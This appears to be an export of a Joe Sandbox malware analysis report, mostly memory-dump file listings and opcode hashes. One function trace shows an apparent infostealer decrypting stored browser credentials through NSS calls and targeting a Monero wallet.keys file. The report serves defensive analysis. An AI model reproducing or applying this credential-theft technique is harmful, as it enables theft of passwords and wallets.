Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: b3993a9a8c90fbf6a27dc35e6e50fb9bb8ec369444e619c6f3f3df5be9fcfc43
Instruction ID: 74f954d73cb020a04c1b3b5e9b03005d4b17b47d668c1eb7d005ee289fb7c571
Opcode Fuzzy Hash: b3993a9a8c90fbf6a27dc35e6e50fb9bb8ec369444e619c6f3f3df5be9fcfc43
Instruction Fuzzy Hash: 1641F770A00A289FEB24DB58CC95B9BB7B4FB49702F4041D8F619E7290E7716E85CF50

Function 00C5C8B0 Relevance: 4.4, Strings: 3, Instructions: 627COMMON

Download Yara Rule

Strings

TuOl, xrefs: 00C5CFAC
zv_, xrefs: 00C5CD1D
]`{, xrefs: 00C5C8C8

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: TuOl$zv_$]`{
API String ID: 0-2120157344
Opcode ID: 889473842035b0fb4859fe696bade4f7993a6cac1a29e0a00f81a757d74c9baa
Instruction ID: 5debe48687933235a1ff4b319a637f3cb8201120cb9c4b6995619ae4fda8d8f7
Opcode Fuzzy Hash: 889473842035b0fb4859fe696bade4f7993a6cac1a29e0a00f81a757d74c9baa
Instruction Fuzzy Hash: A712F7F3608204AFE304AE2DEC8566AF7EAEFD4720F19853DE6C4C3744EA3599058656

Function 00B0A7C9 Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

3w6, xrefs: 00B0A931

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 3w6
API String ID: 0-2729844759
Opcode ID: 120a0ab69afd7cd5911d8e84efa495c31d245d64f15c451fb8102c067cb668be
Instruction ID: 84594cf0ac23daa824466af4803db8c9514152ec1648d488a31f65ebd0a40923
Opcode Fuzzy Hash: 120a0ab69afd7cd5911d8e84efa495c31d245d64f15c451fb8102c067cb668be
Instruction Fuzzy Hash: 6B5126F3F042104BF3449979EC9536BB696ABD4320F2B8639DA88977C4E8795C054282

Function 00B9EBD5 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b19fc1966bd6bde335dadf03bf350d8a50212e0490208899e0a65bcc23f20a
Instruction ID: 7bc4651f81604004b4e50714691c12efa30f8d556348d0c9e4178a3ea885934a
Opcode Fuzzy Hash: a2b19fc1966bd6bde335dadf03bf350d8a50212e0490208899e0a65bcc23f20a
Instruction Fuzzy Hash: CB51F2F360C3049BE7087E29EC957BABBE5EF94720F160A3DD6D583784EA7854048647

Function 00D1BF10 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a0a126810673eab7948a993713b6c69389caea01bc130366f91439c831e8178
Instruction ID: 7372b8a862f0c48fc2ad4bba977eac620dd8b08a799922e4b4e8ecbc941ac5c5
Opcode Fuzzy Hash: 9a0a126810673eab7948a993713b6c69389caea01bc130366f91439c831e8178
Instruction Fuzzy Hash: 3551A6B795C214EBC7002E18EC415B9F7E4EF54351F26482EEAC697340DA328C81DBE6

Function 00D1E7E7 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4c0e4bec74fca87835756240c6cca27739db2803bff524124c2f1889ee7d96
Instruction ID: 262c12c7b42ab584592d7fae95de91c2b2e1c59bf5a14bbbaa65fa56b6ea9789
Opcode Fuzzy Hash: fe4c0e4bec74fca87835756240c6cca27739db2803bff524124c2f1889ee7d96
Instruction Fuzzy Hash: 8E3116B250C700AFE345AF59DC826BEFBE9EF98720F06492DE2C583650D6759440CB57

Function 008A9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 0089C990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0089C9A5

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0142D5A8,00000000,?,008B144C,00000000,?,?), ref: 0089CA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0089CA89
GetFileSize.KERNEL32(00000000,00000000), ref: 0089CA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0089CAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0089CAD9
StrStrA.SHLWAPI(?,0142D410,008B0B52), ref: 0089CAF7
StrStrA.SHLWAPI(00000000,0142D3F8), ref: 0089CB1E
StrStrA.SHLWAPI(?,0142DC60,00000000,?,008B1458,00000000,?,00000000,00000000,?,01429168,00000000,?,008B1454,00000000,?), ref: 0089CCA2
StrStrA.SHLWAPI(00000000,0142DA20), ref: 0089CCB9

Part of subcall function 0089C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0089C871
Part of subcall function 0089C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0089C87C
Part of subcall function 0089C820: PK11_GetInternalKeySlot.NSS3 ref: 0089C88A
Part of subcall function 0089C820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0089C8A5
Part of subcall function 0089C820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0089C8EB
Part of subcall function 0089C820: PK11_FreeSlot.NSS3(?), ref: 0089C961

StrStrA.SHLWAPI(?,0142DA20,00000000,?,008B145C,00000000,?,00000000,01429158), ref: 0089CD5A
StrStrA.SHLWAPI(00000000,01429038), ref: 0089CD71

Part of subcall function 0089C820: lstrcat.KERNEL32(?,008B0B46), ref: 0089C943
Part of subcall function 0089C820: lstrcat.KERNEL32(?,008B0B47), ref: 0089C957
Part of subcall function 0089C820: lstrcat.KERNEL32(?,008B0B4E), ref: 0089C978

lstrlen.KERNEL32(00000000), ref: 0089CE44
CloseHandle.KERNEL32(00000000), ref: 0089CE9C
NSS_Shutdown.NSS3 ref: 0089CEAA

Strings

, xrefs: 0089C9C6

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

